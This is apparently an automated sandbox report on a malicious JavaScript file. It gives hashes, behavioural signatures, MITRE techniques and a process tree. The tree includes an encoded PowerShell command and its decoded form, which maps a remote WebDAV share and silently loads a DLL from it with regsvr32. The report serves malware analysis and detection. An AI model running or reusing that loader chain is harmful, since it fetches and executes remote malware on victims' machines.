Analysis
max time kernel: 132s
max time network: 127s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21/08/2024, 15:57
Static task: static1
Behavioral task: behavioral1
  Sample: a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
  Resource: win7-20240705-en
Behavioral task: behavioral2
  Sample: a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
  Resource: win10v2004-20240802-en
General
Target: a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
Size: 13KB
MD5: c0ed197aef6e402ba2f1f286ef7a5e0b
SHA1: 50dddbc2aad2e5c20f84b146718aae109ac184bc
SHA256: a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25
SHA512: 6fb36968dbc7a00471258f2df63a7adacafca53d7750f199c440fb502a7fa3d0b27c208de824792b9107b1dc11df6c4acbe5038ae897d98258c9f27fa331bd7f
SSDEEP: 96:6To/qCXep9vYcV9YDuHDwDQDmFouDylnCDoDnDVLD5ouDylnCDoDnDiND:1qCu9nV9YKHccwWlnCkDRLrWlnCkDm5
Malware Config
Signatures

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation
  Process: wscript.exe

Obfuscated Files or Information: Command Obfuscation (1 TTP)
Adversaries may obfuscate content during command execution to impede detection.

Command and Scripting Interpreter: JavaScript (1 TTP)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Runs net.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid   Process
  1796  powershell.exe
  1796  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  1796  powershell.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                        pid   Process         procid_target
  PID 3292 wrote to memory of 1796   3292  wscript.exe     86
  PID 3292 wrote to memory of 1796   3292  wscript.exe     86
  PID 1796 wrote to memory of 4484   1796  powershell.exe  88
  PID 1796 wrote to memory of 4484   1796  powershell.exe  88
  PID 1796 wrote to memory of 900    1796  powershell.exe  89
  PID 1796 wrote to memory of 900    1796  powershell.exe  89
Processes

1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\a4d988e16af841243a863f4e0b905431c9e6d66b9746657e259e6b13db75db25.js
   PID: 3292
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcACAAOwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXABkAGEAaQBsAHkAdwBlAGIAcwB0AGEAdABzAC4AYwBvAG0AQAA4ADgAOAA4AFwAZABhAHYAdwB3AHcAcgBvAG8AdABcADMAMwA5ADgAMwAyADUAMwAxADQAMAA2ADgALgBkAGwAbAA=
      Decoded -EncodedCommand (UTF-16LE base64, matching the two child command lines below): net use \\dailywebstats.com@8888\davwwwroot\ ; regsvr32 /s \\dailywebstats.com@8888\davwwwroot\3398325314068.dll
      PID: 1796
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\net.exe
         Command line: "C:\Windows\system32\net.exe" use \\dailywebstats.com@8888\davwwwroot\
         PID: 4484

      3. C:\Windows\system32\regsvr32.exe
         Command line: "C:\Windows\system32\regsvr32.exe" /s \\dailywebstats.com@8888\davwwwroot\3398325314068.dll
         PID: 900
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82